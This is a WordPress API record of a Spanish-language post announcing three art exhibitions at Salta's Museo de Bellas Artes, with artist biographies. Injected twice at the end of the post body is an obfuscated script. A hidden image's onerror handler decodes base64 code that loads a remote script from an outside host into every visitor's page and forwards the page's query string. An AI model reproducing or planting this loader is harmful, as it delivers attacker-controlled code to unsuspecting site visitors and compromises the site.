{"id":5122,"date":"2025-05-07T08:32:30","date_gmt":"2025-05-07T11:32:30","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5122"},"modified":"2025-08-13T23:34:35","modified_gmt":"2025-08-14T02:34:35","slug":"el-bellas-artes-inaugura-tres-imperdibles-muestras","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5122","title":{"rendered":"El Bellas Artes inaugura tres imperdibles muestras"},"content":{"rendered":"\n<p><strong><em>Ma\u00f1ana jueves 8 de mayo, a las 19, el Museo de Bellas Artes de Salta Lola Mora inaugura las muestras \u201c\u00bfUn arte de residir? Anacron\u00edas de un dispositivo de encuentro\u201d, \u201cMeditaciones Topogr\u00e1ficas\u201d y \u201cSentarse bajo un \u00e1rbol\u201d.<\/em><\/strong><\/p>\n\n\n\n<p>Las exposiciones \u201c\u00bfUn arte de residir? Anacron\u00edas de un dispositivo de encuentro\u201d de Graciela de Oliveira, y \u201cMeditaciones Topogr\u00e1ficas\u201d de Lucrecia Urbano, presentan obras gr\u00e1ficas que exhiben relatos \u00edntimos desde el grabado y la fotograf\u00eda, volviendo sobre pr\u00e1cticas anal\u00f3gicas de la imagen en relaci\u00f3n al cuerpo como primer territorio.<\/p>\n\n\n\n<p>\u201cSentarse bajo un \u00e1rbol\u201d de Mariano Cornejo, se trata de una muestra antol\u00f3gica de los \u00faltimos veinte a\u00f1os de producci\u00f3n del reconocido artista.<\/p>\n\n\n\n<p>Se podr\u00e1n visitar a partir del viernes 9, con entrada gratuita, en Av. Belgrano 992.<\/p>\n\n\n\n<p><strong>Graciela de Oliveira<\/strong><\/p>\n\n\n\n<p>Graciela de Oliveira naci\u00f3 en Misiones. Es Arquitecta, Especialista en Antropolog\u00eda Social y Doctoranda en Ciencias Humanas. Formada en pr\u00e1cticas art\u00edsticas como la fotograf\u00eda, la literatura y el cine, trabaja en arte contempor\u00e1neo y arte-investigaci\u00f3n. Es autora y formadora en procesos creativos transdisciplinares.<\/p>\n\n\n\n<p><strong>Lucrecia Urbano<\/strong><\/p>\n\n\n\n<p>Lucrecia Urbano naci\u00f3 en C\u00f3rdoba. All\u00ed realiz\u00f3 la Licenciatura en grabado. Luego obtuvo un Master\u2019s degree in non-toxic printmaking en la Universidad Grande Prairie Regional College en Alberta, Canad\u00e1. Realiz\u00f3 numerosas muestras individuales y colectivas en ciudades de todo el mundo, as\u00ed como acciones y proyectos que la presentan como una artista activamente comprometida con su pr\u00e1ctica laboral. Recibi\u00f3 m\u00faltiples premios y distinciones, y particip\u00f3 en conferencias y charlas. Dedic\u00f3 a\u00f1os de su vida a la docencia y la investigaci\u00f3n.<\/p>\n\n\n\n<p><strong>Mariano Cornejo<\/strong><\/p>\n\n\n\n<p>Mariano Cornejo naci\u00f3 en Salta. Sus primeros estudios de pintura los realiz\u00f3 en esa ciudad con los maestros Julio Coll Arias y Osvaldo Juane.<\/p>\n\n\n\n<p>Es Profesor Nacional de Dibujo y Pintura, egresado de la Escuela de Arte Prilidiano Pueyrred\u00f3n y Licenciado en Artes Pl\u00e1sticas por la Universidad Complutense de Madrid.<\/p>\n\n\n\n<p>Por su actividad art\u00edstica recibi\u00f3 numerosos premios en Salta y Buenos Aires. Realiz\u00f3 exposiciones en su ciudad natal y en ciudades como Buenos Aires, Madrid, Barcelona, Nueva York y Frankfurt.<\/p>\n\n\n\n<p>Public\u00f3 libros de poemas, fotograf\u00edas, arqueolog\u00eda y pinturas. Su inter\u00e9s por la arqueolog\u00eda lo llev\u00f3 a participar de numerosos congresos sobre Arte rupestre.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana jueves 8 de mayo, a las 19, el Museo de Bellas Artes de Salta Lola Mora inaugura las muestras \u201c\u00bfUn arte de residir? Anacron\u00edas de un dispositivo de encuentro\u201d, \u201cMeditaciones Topogr\u00e1ficas\u201d y \u201cSentarse bajo un \u00e1rbol\u201d. Las exposiciones \u201c\u00bfUn arte de residir? Anacron\u00edas de un dispositivo de encuentro\u201d de Graciela de Oliveira, y \u201cMeditaciones [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5123,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[9],"tags":[],"class_list":{"0":"post-5122","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5122"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5122"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5122\/revisions"}],"predecessor-version":[{"id":6503,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5122\/revisions\/6503"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5123"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5122"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5122"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5122"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}